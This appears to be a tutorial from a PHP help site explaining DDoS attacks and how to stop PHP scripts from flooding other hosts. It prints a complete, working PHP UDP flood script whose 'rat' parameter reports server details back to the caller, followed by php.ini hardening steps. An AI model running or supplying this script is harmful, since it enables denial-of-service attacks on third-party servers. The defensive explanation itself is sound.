PHP solution to DDoS attacks

First understand ddos: Distributed Denial of Service (DDoS: Distributed Denial of Service) attack refers to using client/server technology to unite multiple computers as an attack platform to launch DDoS against one or more targets. attack, thus exponentially increasing the power of denial of service attacks. Usually, an attacker uses a stolen account to install the DDoS master program on a computer. At a set time, the master program will communicate with a large number of agent programs that have been installed on the network. on many computers. The agent launches the attack when instructed to do so. Using client/server technology, the master program can activate hundreds or thousands of agent runs in seconds.

Let’s use an analogy to deeply understand what DDOS is.

A group of bullies are trying to prevent the competing store opposite from operating normally. What methods will they use? (This is just an example, do not imitate.) Bullies pretend to be ordinary customers and crowd into their rivals' stores, refusing to leave, but real shoppers cannot enter; or they always chat with the salespersons. , so that the staff cannot serve customers normally; it can also provide false information to the store operators. After everyone in the store is busy, they find that everything is in vain, and finally loses the real big customers, resulting in heavy losses. In addition, it is sometimes difficult for bullies to accomplish these bad deeds on their own, requiring many people to work together. Well, DoS and DDoS attacks in the field of network security follow these ideas.

This article mainly introduces the solution to Ddos attacks in PHP. It analyzes the principles and targeted solutions of Ddos attack programs with examples. It is a very practical skill. Friends who need it can refer to it

Look at the source code first, the code is as follows:

<?php 
set_time_limit(999999); 
$host = $_GET[&#39;host&#39;]; 
$port = $_GET[&#39;port&#39;]; 
$exec_time = $_GET[&#39;time&#39;]; 
$Sendlen = 65535; 
$packets = 0; 
ignore_user_abort(True); 
 
if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0){ 
        if (StrLen($_GET[&#39;rat&#39;])<>0){ 
                echo $_GET[&#39;rat&#39;].$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER[&#39;SERVER_NAME&#39;])."|".php_uname()."|".$_SERVER[&#39;SERVER_SOFTWARE&#39;].$_GET[&#39;rat&#39;]; 
                exit; 
            } 
        echo "Parameters can not be empty!"; 
        exit; 
    } 
 
for($i=0;$i<$Sendlen;$i++){ 
        $out .= "A"; 
    } 
 
$max_time = time()+$exec_time; 
 
while(1){ 
    $packets++; 
    if(time() > $max_time){ 
        break; 
    } 
    $fp = fsockopen("udp://$host", $port, $errno, $errstr, 5); 
        if($fp){ 
            fwrite($fp, $out); 
            fclose($fp); 
    } 
} 
 
echo "Send Host：$host:$port<br><br>"; 
echo "Send Flow：$packets * ($Sendlen/1024=" . round($Sendlen/1024, 2) . ")kb / 1024 = " . round($packets*$Sendlen/1024/1024, 2) . " mb<br><br>"; 
echo "Send Rate：" . round($packets/$exec_time, 2) . " packs/s；" . round($packets/$exec_time*$Sendlen/1024/1024, 2) . " mb/s"; 
?>

The key code is as follows:

$fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);

The method is very simple, send a UDP packet to the target host, and add the definition of infinite A dead

loop

will create greater pressure. This pressure is for the server that executes this script, because it first causes a large amount of its own network bandwidth, CPU and other resources. Occupy, if you want to use this script to put pressure on the target site, you need to execute the script on multiple servers. For DDOS, since you use fsockopen to request the outside, then don’t let him request.

php Set

in .ini, the code is as follows:

allow_url_fopen = Off

If he can still send the package, the code is as follows:

extension=php_sockets.dll

is changed to

;extension=php_sockets.dll

Restart APACHE, IIS, and NGINX , this can prevent PHP DDOS from sending packages.

In addition, some netizens said that it is very simple to disable the script from being set to no timeout:

1. Disable the set_time_limit

function

2. Enable PHP's

safe mode

(safe_mode=on).To disable the socket function, you can directly disable all socket modules or disable the fsockopen function. It is recommended. Since sockets are often used to send emails to retrieve passwords, it is recommended to turn on the safe mode directly. However, in this case, the script will time out every 30 seconds. It is estimated that no "hacker" is lonely enough to click to start DDOS every 30 seconds.

The above is the detailed content of PHP solution to DDoS attacks. For more information, please follow other related articles on the PHP Chinese website!